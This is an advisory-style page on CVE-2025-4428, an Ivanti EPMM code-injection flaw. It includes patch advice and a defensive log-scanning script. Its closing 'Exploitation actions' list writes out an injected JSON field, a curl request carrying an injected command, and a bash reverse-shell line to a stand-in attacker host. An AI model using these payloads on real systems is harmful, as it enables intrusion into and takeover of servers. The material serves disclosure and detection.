Ivanti EPMM: Remote Code Execution in Ivanti Endpoint Manager Mobile API (CVE-2025-4428) #shorts
Summary
Welcome to today’s security update. We’re discussing CVE-2025-4428, a critical remote code execution vulnerability in Ivanti Endpoint Manager Mobile. Disclosed in mid-May 2025 and confirmed exploited in the wild, this flaw allows attackers to run arbitrary code on vulnerable installations. Stay tuned as we break down the details and what you need to do to protect your environment.
Product details
Ivanti Endpoint Manager Mobile, also known as EPMM, is a unified endpoint management solution that secures and manages mobile devices across enterprises. The affected component is the EPMM API in version 12.5.0.0 and earlier on all supported platforms. Ivanti released version 12.5.0.1 which addresses this issue; earlier versions remain vulnerable.
Vulnerability type summary
CVE-2025-4428 stems from improper control of code generation, classified under CWE-94: Code Injection. The vulnerability exists in the API logic where crafted requests can manipulate the system’s execution flow, leading to unauthorized code injection and execution.
Details of the vulnerability
Authenticated users can send specially crafted API calls that inject malicious code into the EPMM server process. While this flaw alone requires valid credentials, security researchers at watchTowr Labs demonstrated an unauthenticated attack chain when combining CVE-2025-4427 (an authentication bypass issue) with CVE-2025-4428. This chain allows attackers to bypass login checks and then execute arbitrary payloads, fully compromising the management server. Ivanti confirmed active exploitation in targeted attacks, and CERT issued advisories urging immediate patching.
Conclusion
CVE-2025-4428 poses a severe risk to any organization running Ivanti EPMM 12.5.0.0 or earlier. Administrators should apply the 12.5.0.1 update without delay, review access logs for suspicious API activity, and ensure all mobile management endpoints are behind proper network controls. That’s all for this episode—stay vigilant and keep your systems patched.
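The advisory recommends reviewing access logs for suspicious API activity and confirming the installed version is at least 12.5.0.1. The script below is an added example for that review, not Ivanti's code or part of the original page; the one-JSON-object-per-line log layout, the field names (ts, user, method, path, status, body) and the sample records are constructed for illustration, since EPMM's real log format is not described here, so parse_line-style adaptation to your own log source is expected.

```python
"""Added example (not Ivanti's code): review EPMM-style API access logs for
request bodies carrying shell metacharacters, and check a version string
against the fixed release named in the advisory (12.5.0.1).

Assumption: one JSON object per log line with keys ts, user, method, path,
status and body (the raw request body as a string). This layout is constructed
for the example; EPMM's real log format is not given in the advisory.
"""
import json
import re

# From the advisory: 12.5.0.0 and earlier are affected, 12.5.0.1 fixes the issue.
FIXED_VERSION = (12, 5, 0, 1)

# Shell metacharacters that have no business inside a device name or similar
# field. Kept narrow (';', '|', backtick, '$(', '&&', newline) so that legitimate
# values such as "R&D iPad" do not trigger on a single '&'.
SHELL_META = re.compile(r"[;|`]|\$\(|&&|\n")


def is_vulnerable_version(version: str) -> bool:
    """True if an EPMM version string is 12.5.0.0 or earlier (pads short forms)."""
    parts = tuple(int(p) for p in version.split("."))
    parts = parts + (0,) * (4 - len(parts))
    return parts < FIXED_VERSION


def string_fields(obj, key="<root>"):
    """Yield (field name, value) for every string anywhere inside a JSON body."""
    if isinstance(obj, str):
        yield key, obj
    elif isinstance(obj, dict):
        for k, v in obj.items():
            yield from string_fields(v, k)
    elif isinstance(obj, list):
        for v in obj:
            yield from string_fields(v, key)


def suspicious_fields(body: str) -> list:
    """Return the (field, value) pairs in a request body that contain shell metacharacters."""
    try:
        parsed = json.loads(body)
    except json.JSONDecodeError:
        # Non-JSON body: still flag it if the raw text looks like a command string.
        return [("<unparsed>", body)] if SHELL_META.search(body) else []
    return [(k, v) for k, v in string_fields(parsed) if SHELL_META.search(v)]


def review_log(lines) -> list:
    """Scan log lines and return one finding per API request with a suspicious body."""
    findings = []
    for line in lines:
        try:
            rec = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip lines that are not in the assumed JSON layout
        if not str(rec.get("path", "")).startswith("/api/"):
            continue  # only the API surface is in scope for this review
        hits = suspicious_fields(str(rec.get("body", "")))
        if hits:
            findings.append({"ts": rec.get("ts"), "user": rec.get("user"),
                             "path": rec["path"], "fields": hits})
    return findings


# Constructed sample log: one benign device registration, one request whose
# deviceName carries the "; id" pattern quoted on this page, one non-API
# request and one malformed line.
SAMPLE_RECORDS = [
    {"ts": "2025-05-14T10:02:11Z", "user": "admin", "method": "POST",
     "path": "/api/devices", "status": 200,
     "body": json.dumps({"deviceName": "sales-ipad-07"})},
    {"ts": "2025-05-14T10:05:42Z", "user": "svc-mdm", "method": "POST",
     "path": "/api/devices", "status": 200,
     "body": json.dumps({"deviceName": "test; id"})},
    {"ts": "2025-05-14T10:06:03Z", "user": "admin", "method": "GET",
     "path": "/login", "status": 200, "body": ""},
]
SAMPLE_LOG = [json.dumps(r) for r in SAMPLE_RECORDS] + ["not a json line"]


if __name__ == "__main__":
    print("12.5.0.0 vulnerable:", is_vulnerable_version("12.5.0.0"))
    print("12.5.0.1 vulnerable:", is_vulnerable_version("12.5.0.1"))
    for f in review_log(SAMPLE_LOG):
        print(f"{f['ts']} user={f['user']} path={f['path']} fields={f['fields']}")
```

Any hit is a lead, not proof: the authenticated account named in the finding should be checked for credential compromise, and on an unpatched server the same request pattern arriving without a valid session is consistent with the bypass chain described above.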
Watch the full video on YouTube: CVE-2025-4428
Remediation and exploitation details
This chain involves the following actors
- Authenticated Attacker: Exploits the vulnerability to run code on the server
- IT Administrator: Maintains and secures the Ivanti Endpoint Manager Mobile server
The following systems are involved
- Ivanti Endpoint Manager Mobile (Enterprise mobile device management): Hosts the vulnerable application programming interface component
Attack entry point
- Mobile Application Programming Interface Endpoint: HTTP interface used for device management requests
Remediation actions
Exploitation actions
Login with stolen or guessed credentials
- Use phishing or credential stuffing to acquire a legitimate account
Manipulate request body data to include code injection
- Insert operating system commands into a JSON field, for example: {"deviceName":"test; uname -a"}
Remote code execution via crafted API call
- curl -X POST https://server.example.com/api/devices -H "Content-Type: application/json" -d '{"deviceName":"test; id"}'
Operating system command injection followed by reverse connection
- bash -i >& /dev/tcp/attacker.example.com/4444 0>&1
Related Content
NOTE: The following related content has not been vetted and may be unsafe.
- https://forums.ivanti.com/s/article/Security-Advisory-Ivanti-Endpoint-Manager-Mobile-EPMM
- [2025-05-13] Ivanti confirms exploitation of vulnerabilities in EPMM, urges customers to patch.
- [2025-05-15] Ivanti EPMM Unauth RCE Chain (CVE-2025-4427 and CVE-2025-4428) vulnerability discovered by watchTowr Labs.
- [2025-05-16] CERT detected Ivanti issued a security advisory to fix the authentication bypass and remote code execution vulnerabilities (CVE-2025-4427/CVE-2025-4428) in Ivanti Endpoint Manager Mobile (EPMM).
- [2025-05-14] Ivanti released a security advisory for two vulnerabilities in its Endpoint Manager Mobile (EPMM) product.